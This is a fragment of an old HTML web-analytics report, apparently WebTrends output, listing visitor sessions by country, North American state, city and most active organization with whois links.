COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Denmark&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Denmark&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>France&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>France&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>France&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>France&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>France&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Finland&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Finland&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Finland&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Finland&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Finland&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Switzerland&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Switzerland&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Switzerland&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Switzerland&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Switzerland&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#D0D0D0"> <TD>&nbsp;</TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>7839</B></TD></TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopStates"><!--Visitors & Demographics::North American States--></A> <!-- WT_H1>North American States and Provinces</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>North American States and Provinces</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section breaks down web site activity to show which of the North American States and Provinces were the most active on the site. This information is based on where the domain name of the visitor is registered, and may not always be an accurate representation of the actual geographic location of this visitor. This information can only be displayed if reverse DNS lookups have been performed.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR> <TD><IMG SRC="index08.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=3 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>3, .3, 3.7, 2</WT_TABLE_STATS --> <CENTER><B>North American States & Provinces</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>North American States</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=5%><B>&nbsp;&nbsp;&nbsp;</B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>State</CENTER></B></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Virginia</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3928</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>California</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">743</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Minnesota</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">297</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Georgia</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">234</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Oregon</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">182</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Illinois</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">67</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Ontario</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">46</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Texas</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">45</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Florida</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">39</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Washington</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">38</TD></TR> <TR BGCOLOR="#D0D0D0"> <TD>&nbsp;</TD> <TD><FONT SIZE=3 FACE="" COLOR="#000000"><B>Total For the States Above</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>5619</B></TD></TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopCities"><!--Visitors & Demographics::Most Active Cities--></A> <!-- WT_H1>Most Active Cities</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Active Cities</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section further breaks down the site's activity to show which cities were the most active on the site. This information is based on where the domain name of the visitor is registered, and may not always be an accurate representation of the actual geographic location of this visitor. This information can only be displayed if reverse DNS lookups have been performed.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR> <TD><IMG SRC="index09.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=3 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>3, .3, 3.7, 2</WT_TABLE_STATS --> <CENTER><B>Activity by City</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Most Active Cities</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=5%><B>&nbsp;&nbsp;&nbsp;</B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>City, State</CENTER></B></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Vienna, Virginia, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3786</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Berkeley, California, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">271</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Golden Valley, Minnesota, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">256</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Mountain View, California, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">213</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Atlanta, Georgia, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">189</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Medofrd, Oregon, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">175</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Falls Church, Virginia, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">103</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Palo Alto, California, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">97</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Norcross, Georgia, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">40</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>San Francisco, California, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">37</TD></TR> <TR BGCOLOR="#D0D0D0"> <TD>&nbsp;</TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For the Cities Above</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>5167</B></TD></TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopCompanies"><!--Visitors & Demographics::Most Active Organizations--></A> <!-- WT_H1>Most Active Organizations</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Active Organizations</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the companies or organizations that accessed the site the most often.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR> <TD><IMG SRC="index10.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>5, .3, 2.7, 1 , 1 , 1 </WT_TABLE_STATS --> <CENTER><B>Most Active Organizations</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Most Active Organizations</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=5%><B>&nbsp;&nbsp;&nbsp;</B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Organizations</CENTER></B></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD> </TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>America Online</B><BR><A href="http://rs.internic.net/cgi-bin/whois?aol.com">aol.com</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6826</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10.83%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3785</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Leni Wilcox Consultant</B><BR><A href="http://rs.internic.net/cgi-bin/whois?home.com">home.com</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2986</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.73%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">256</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Mikota Maentz</B><BR><A href="http://rs.internic.net/cgi-bin/whois?rr.com">rr.com</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2194</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.48%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">175</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Bellsouth Network Solutions</B><BR><A href="http://rs.internic.net/cgi-bin/whois?bellsouth.net">bellsouth.net</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2130</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.37%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">123</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Uunet Technologies Inc.</B><BR><A href="http://rs.internic.net/cgi-bin/whois?uu.net">uu.net</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1279</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.02%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">101</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><A href="http://rs.internic.net/cgi-bin/whois?198.139.155.30">198.139.155.30</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1075</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.7%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1075</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Mindspring Enterprises Inc.</B><BR><A href="http://rs.internic.net/cgi-bin/whois?mindspring.com">mindspring.com</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">816</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.29%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">50</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><A href="http://rs.internic.net/cgi-bin/whois?fastsearch.net">fastsearch.net</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">754</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.19%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">113</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 